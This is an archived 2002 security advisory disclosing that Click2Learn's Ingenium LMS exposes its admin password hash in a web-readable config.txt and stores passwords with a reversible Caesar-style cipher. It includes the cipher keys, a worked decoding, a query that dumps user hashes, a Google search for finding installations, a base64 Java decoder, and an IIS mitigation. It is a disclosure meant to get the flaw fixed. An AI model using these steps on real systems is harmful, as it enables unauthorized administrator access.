TUCoPS :: Web :: General :: ingeni1.txt

Ingenium Admin Password Vulnerability


    The vendor was contacted, but I have not received any response (other
than an autoresponder) over the past week...
 -E



Security Advisory -- Click2Learn's Ingenium LMS
Brian Enigma <enigma@netninja.com>
http://netninja.com/papers/ingenium/

-----------------------
OVERVIEW
-----------------------
Product:          Ingenium Learning Management System
Versions:         Known to work on v5.1 and v6.1.  It is likely
                  that all versions are vulnerable.  Click2Learn's
                  Aspen LMS has not been tested.
Vulnerabilities:  (1) Administrator password, public visibility
                  (2) All user passwords visible with database SELECT
                  access
Affected Systems: All Ingenium installations visible to the public
                  internet (do a Google search for "Ingenium Web
                  Connect")
Reporter:         Brian Enigma <enigma@netninja.com>
Vendor Contacted: 2002-10-07, no response
Publication Date: 2002-10-14
Company:          Click2Learn
Company URL:      http://home.click2learn.com/

-----------------------
BACKGROUND
-----------------------
I work for a company that uses Click2Learn's Ingenium Learning Management
System.  Part of my job involves locating, evaluating, and fixing security
vulnerabilities in an assortment of products.  A few things about Ingenium have
recently caught my interest.  First, a user on the public internet can retrieve
the administrator's password hash.  Second, the password hash is easily
reversible.  Third, user passwords (not as easily accessible, as they are
stored in a Microsoft SQL database) are also hashed using the same reversible
algorithm.

-----------------------
SEVERITY
-----------------------
This is a very serious problem.  Any site using Ingenium as their learning
management system is vulnerable.  Since the HTML title used by the frameset in
all Ingenium installations is "Ingenium Web Connect," a Google search will
reveal quite a number of vulnerable sites.  In theory, a user can log into any
of these sites as an administrator using these vulnerabilities.

-----------------------
ADMINISTRATOR PASSWORD HASH VISIBILITY
-----------------------
Ingenium stores a number of configuration parameters in a Microsoft SQL
database.  It also must store a few values on the local system, as it needs to
know several important values before being able to access the database--for
instance, the location, login, and password for connecting to the database.
Basically this is the database "bootstrap" information.  In examining the file
more closely (it is called [install directory]/config/config.txt), I also noted
that the application's administrator password, as a hashed value, is also
stored in this file.  Even further inspection of the file location, directory
structure, and IIS installation shows that the file is located in a folder
under the htdocs web directory!  This means that a simple HTTP request can grab
the config file!  

In most default installations, replacing the "default.asp" file name in the
URL, when looking at the Ingenium home page, with "config/config.txt" will
retrieve the file, including the administrator password hash.  This is just
plain silly!  Most web programmers with any amount of training or experience
know that you need to store your data out-of-band from the documents/programs.
Raw data files should not be web accessible.  

While this particular vulnerability is a known issue (see Click2Learn's
Knowledge Base article Q1254), it is brushed off as advice for the paranoid.
Personal observation has not shown a single site that hides this configuration
file.  Utilizing this vulnerability leads us to the importance of the next one.

-----------------------
ADMINISTRATOR PASSWORD HASH DECRYPTION
-----------------------
You may or my not already know that the best way to store passwords in a
persistent data store is with a one-way hash function.  In fact, this is how
all Unix systems work.  You cannot reverse out a password from a password hash
without a lot of brute force--in most cases, so much number crunching that the
process is not worth it.  You may also know that one of the worst ways to store
passwords (or any data) is with XOR "encryption."  Two large enough samples and
a minute of math will give you a pretty darn good idea of what the "encryption"
key is.  An even less secure method of encrypting data is with a secret decoder
ring.  In fact, most newspapers have a "Cryptogram" section with the Sunday
comics that lets you solve these as a diversion (shameless self-plug:
http://sourceforge.net/projects/cryptoslam/).  It is called a Caesar cypher and
is made mildly more challenging/annoying by varying the offset depending on the
position of the letter in the message.

I'll give you three guesses what Ingenium uses to store passwords, but the
first two guesses cannot be "Caesar Cypher."  Yes, Ingenium uses about the same
encryption as a Flash Gordon Secret Decoder Ring.  Implementation would have
been an exercise left for the reader, but it was a slow Friday, so the Java
source will be supplied with this advisory.  Passwords are not case
sensitive--it would appear they are converted to uppercase before being
"encrypted."  The example code will only decode letters and numbers, no special
symbols, but the theory still applies.

In this particular cipher implementation, the key is:

9'$%100'%6

This key repeats if the plaintext is longer than ten characters.  To decode a
given piece of cyphertext, you simply take the hex value of the cyphertext
character and subtract the hex value of the key character in the same position,
giving you a plaintext hex characters.  Note that the number space wraps
between 0x20 and 0x7D.  Just in case you are not following, an example is in
order.  Let us say, as an example, that the password line in config.txt is
"General\LocalAdmin=|smh|#'hp{9'$%10".  The decoding goes something like this:

cypher:       |smh|#'hp{9'$%10
subtract key: 9'$%100'%69'$%10

You will note that only the first ten characters are significant.  The rest are
nulls in the plaintext, giving the cyphertext character the same value as the
key character at that position.  Worked out in hex, this becomes:

cipher:       7c 73 6d 68 7c 23 27 68 70 7b
subtract key: 39 27 24 25 31 30 30 27 25 36
              -----------------------------
equals:       43 4c 49 43 4b 51 55 41 4b 45
in ASCII:     C  L  I  C  K  Q  U  A  K  E

You will notice that the "Q" and "U" wrapped down below 0x20, and back around
to 0x7D.  Experimentation also shows that the numeric digits are somehow offset
such that zero (normally 0c30) is mapped to lowercase n (0x6E).  Symbols are
also mapped into this area, but have not been completely explored.

-----------------------
USER PASSWORD HASH VISIBILITY
-----------------------
This issue is not as severe as the administrator password.  A user will need
SELECT access in the database to utilize this vulnerability.  A simple SELECT *
FROM IWC_USR will give you a list of logins and their corresponding password
hashes.  The password hash employs the same algorithm as above, only you will
need to remove the "$" at the beginning of the password hash and use a slightly
different key (the characters "i0)'0+7/" repeated).

-----------------------
SOLUTION
-----------------------
A good long-term solution would be a software update from Click2Learn that
moves the files in the "config" directory (and possible others) to a path
outside of the web documents.  This requires engineering time and QA resources.
Also, this solution may not apply to entities that purchased the Ingenium LMS
without a support contract.

A simple and immediate solution would be to block the config.txt file from
being downloadable.  Configuring IIS to block access to this directory can
achieve the desired result.  This is a simple operation.  First, open the
Internet Management console.  Next locate the "config" web folder.  Right-click
on it and select "Properties."  Uncheck the "Read" and "Index" checkboxes and
click "OK."  

-= QED =-


--8323328-1491147837-1034640889=:587
Content-Type: TEXT/x-java; name="IngeniumDecoder.java"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0210141714490.587@euclid>
Content-Description: IngeniumDecoder.java
Content-Disposition: attachment; filename="IngeniumDecoder.java"

aW1wb3J0IGphdmF4LnN3aW5nLkpPcHRpb25QYW5lOw0KDQovKioNCiAqIElu
Z2VuaXVtRGVjb2Rlcg0KICogU2ltcGxlIHByb2dyYW0gdG8gZGVjb2RlIHRo
ZSBhZG1pbiBwYXNzd29yZCBoYXNoIHByZXNlbnQgaW4gdGhlIEluZ2VuaXVt
DQogKiBMTVMgY29uZmlnLnR4dCBmaWxlLiAgVGhpcyBmaWxlIGlzIHN0b3Jl
ZCB3aXRoaW4gdGhlIGh0ZG9jcyBkaXJlY3RvcnkNCiAqIHRyZWUsIHNvIGlz
IGF2YWlsYWJsZSB0aHJvdWdoIGEgc2ltcGxlIFVSTC4gIEZvciBpbnN0YW5j
ZSwgaWYgeW91cg0KICogSW5nZW5pdW0gaW5zdGFsbCBpcyBpbiBodHRwOi8v
c3VmZm9say5jbGljazJsZWFybi5jb20vc3VmZm9sa190ZXN0LywgdGhlbg0K
ICogdGhlIGNvbmZpZyBmaWxlIGlzIGxvY2F0ZWQgYXQgDQogKiBodHRwOi8v
c3VmZm9say5jbGljazJsZWFybi5jb20vc3VmZm9sa190ZXN0L2NvbmZpZy9j
b25maWcudHh0LiAgVGhlIHNhbWUNCiAqIHBhc3N3b3JkIGhhc2hpbmcgc2No
ZW1lIGlzIHVzZWQgYm90aCBmb3IgdGhlICJhZG1pbmlzdHJhdG9yIiBsb2dp
biBhY2NvdW50DQogKiBhbmQgdGhlIFNRTCBkYXRhYmFzZSBEU04gcGFzc3dv
cmQuDQogKg0KICogQGF1dGhvciAgQnJpYW4gRW5pZ21hIDxlbmlnbWFAbmV0
bmluamEuY29tPg0KICovDQpwdWJsaWMgY2xhc3MgSW5nZW5pdW1EZWNvZGVy
IHsNCiAgICAvKiogVGhlIGxvdyBlbmQgb2YgdGhlIGtleXNwYWNlICovDQog
ICAgcHVibGljIHN0YXRpYyBpbnQgV1JBUF9CT1RUT00gPSAweDIwOyAvLyBz
cGFjZQ0KICAgIC8qKiBUaGUgaGlnaCBlbmQgb2YgdGhlIGtleXNwYWNlICov
DQogICAgcHVibGljIHN0YXRpYyBpbnQgV1JBUF9UT1AgICAgPSAweDdFOyAv
LyBjbG9zZSBjdXJsZXkgYnJhY2UNCiAgICBwdWJsaWMgc3RhdGljIGludCBD
SEFSX1pFUk8gICA9IDB4NkU7DQogICAgLyoqIFRoZSBzeW1tZXRyaWMga2V5
ICovDQogICAgcHVibGljIHN0YXRpYyBTdHJpbmcgS0VZICAgICAgPSAiOSck
JTEwMCclNiI7DQogICAgDQogICAgLyoqIA0KICAgICAqIEdpdmVuIHNvbWUg
Y3lwaGVydGV4dCwgcHJvZHVjZSB0aGUgcGxhaW50ZXh0LiAgVGhlIGVuY3J5
cHRpb24gbWV0aG9kDQogICAgICogZW1wbG95ZWQgaXMgYSBzaW1wbGUgQ2Fl
c2FyIGN5cGhlciB3aXRoIGEga2V5IHRoYXQgcm90YXRlcyBkZXBlbmRpbmcN
CiAgICAgKiBvbiB0aGUgcG9zaXRpb24gb2YgdGhlIGNoYXJhY3RlciBpbiB0
aGUgcGxhaW50ZXh0L2N5cGhlcnRleHQuICBUaGUNCiAgICAgKiBvZmZzZXQg
aXMgZGV0ZXJtaW5lZCBieSB0aGUgS0VZIHN0cmluZyBhYm92ZS4gIChUaGlz
IGlzIHNpbWlsYXIgdG8NCiAgICAgKiBvYmZ1c2NhdGlvbiB1c2luZyBST1Qt
MTMgY29kaW5nLCBvbmx5IHRoZSAiMTMiIGNoYW5nZXMgYnkgcG9zaXRpb24u
KQ0KICAgICAqDQogICAgICpAcGFyYW0gcyB0aGUgY3lwaGVydGV4dA0KICAg
ICAqQHJldHVybiB0aGUgcGxhaW50ZXh0DQogICAgICovDQogICAgcHVibGlj
IHN0YXRpYyBTdHJpbmcgZGVjb2RlKFN0cmluZyBzKSB7DQogICAgICAgIFN0
cmluZ0J1ZmZlciByZXN1bHQgPSBuZXcgU3RyaW5nQnVmZmVyKCk7DQogICAg
ICAgIGludCBtYXggPSBzLmxlbmd0aCgpOw0KICAgICAgICBmb3IgKGludCBp
PTA7IGk8bWF4OyBpKyspIHsNCiAgICAgICAgICAgIGludCBjeXBoZXJMZXR0
ZXIgPSAoaW50KSBzLmNoYXJBdChpKTsNCiAgICAgICAgICAgIGludCBrZXlM
ZXR0ZXIgPSAoaW50KSBLRVkuY2hhckF0KGkgJSBLRVkubGVuZ3RoKCkpOw0K
ICAgICAgICAgICAgaWYgKGN5cGhlckxldHRlciA9PSBrZXlMZXR0ZXIpDQog
ICAgICAgICAgICAgICAgY29udGludWU7DQogICAgICAgICAgICBpbnQgZGVj
b2RlTGV0dGVyID0gY3lwaGVyTGV0dGVyIC0ga2V5TGV0dGVyOw0KICAgICAg
ICAgICAgaWYgKGRlY29kZUxldHRlciA8IFdSQVBfQk9UVE9NKQ0KICAgICAg
ICAgICAgICAgIGRlY29kZUxldHRlciA9IFdSQVBfVE9QIC0gKFdSQVBfQk9U
VE9NIC0gZGVjb2RlTGV0dGVyKTsNCiAgICAgICAgICAgIGlmICgoZGVjb2Rl
TGV0dGVyID49IENIQVJfWkVSTykgJiYgKGRlY29kZUxldHRlciA8PSBDSEFS
X1pFUk8rMTApKQ0KICAgICAgICAgICAgICAgIHJlc3VsdC5hcHBlbmQoZGVj
b2RlTGV0dGVyIC0gQ0hBUl9aRVJPICsgQ2hhcmFjdGVyLmdldE51bWVyaWNW
YWx1ZSgnMCcpKTsNCiAgICAgICAgICAgIGVsc2UgaWYgKChkZWNvZGVMZXR0
ZXIgPj0gV1JBUF9CT1RUT00pICYmIChkZWNvZGVMZXR0ZXIgPD0gV1JBUF9U
T1ApKQ0KICAgICAgICAgICAgICAgIHJlc3VsdC5hcHBlbmQoQ2hhcmFjdGVy
LnRvU3RyaW5nKChjaGFyKSBkZWNvZGVMZXR0ZXIpKTsNCiAgICAgICAgICAg
IGVsc2UNCiAgICAgICAgICAgICAgICByZXN1bHQuYXBwZW5kKCJbdW5rbm93
biBsZXR0ZXJdIik7DQogICAgICAgIH0NCiAgICAgICAgcmV0dXJuIHJlc3Vs
dC50b1N0cmluZygpOw0KICAgIH0NCiAgICANCiAgICAvKiogQ3JlYXRlcyBh
IG5ldyBpbnN0YW5jZSBvZiBJbmdlbml1bURlY29kZXIgKi8NCiAgICBwcml2
YXRlIEluZ2VuaXVtRGVjb2RlcigpIHsNCiAgICB9DQogICAgDQogICAgcHVi
bGljIHN0YXRpYyB2b2lkIG1haW4oU3RyaW5nW10gYXJndikgew0KICAgICAg
ICAvL1N5c3RlbS5vdXQucHJpbnRsbihkZWNvZGUoInxzbWh8IydocHs5JyQl
MTAiKSk7DQogICAgICAgIFN0cmluZyBoYXNoZWRQYXNzID0gSk9wdGlvblBh
bmUuc2hvd0lucHV0RGlhbG9nKA0KICAgICAgICAgICAgbnVsbCwNCiAgICAg
ICAgICAgICJQbGVhc2UgZW50ZXIgdGhlIFwiaGFzaGVkXCIgYWRtaW4gcGFz
c3dvcmQgZnJvbSBjb25maWcudHh0IiwNCiAgICAgICAgICAgICJFbnRlciBo
YXNoIiwNCiAgICAgICAgICAgIEpPcHRpb25QYW5lLlFVRVNUSU9OX01FU1NB
R0UpOw0KICAgICAgICBpZiAoKGhhc2hlZFBhc3MgIT0gbnVsbCkgJiYgKGhh
c2hlZFBhc3MubGVuZ3RoKCkgPiAwKSkNCiAgICAgICAgICAgIEpPcHRpb25Q
YW5lLnNob3dNZXNzYWdlRGlhbG9nKA0KICAgICAgICAgICAgICAgIG51bGws
IA0KICAgICAgICAgICAgICAgICJUaGUgZGVjb2RlZCBwYXNzd29yZCBpcyAi
ICsgZGVjb2RlKGhhc2hlZFBhc3MpLA0KICAgICAgICAgICAgICAgICJQbGFp
bnRleHQiLA0KICAgICAgICAgICAgICAgIEpPcHRpb25QYW5lLklORk9STUFU
SU9OX01FU1NBR0UpOw0KICAgICAgICBTeXN0ZW0uZXhpdCgwKTsNCiAgICB9
DQogICAgDQp9DQo=
--8323328-1491147837-1034640889=:587--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH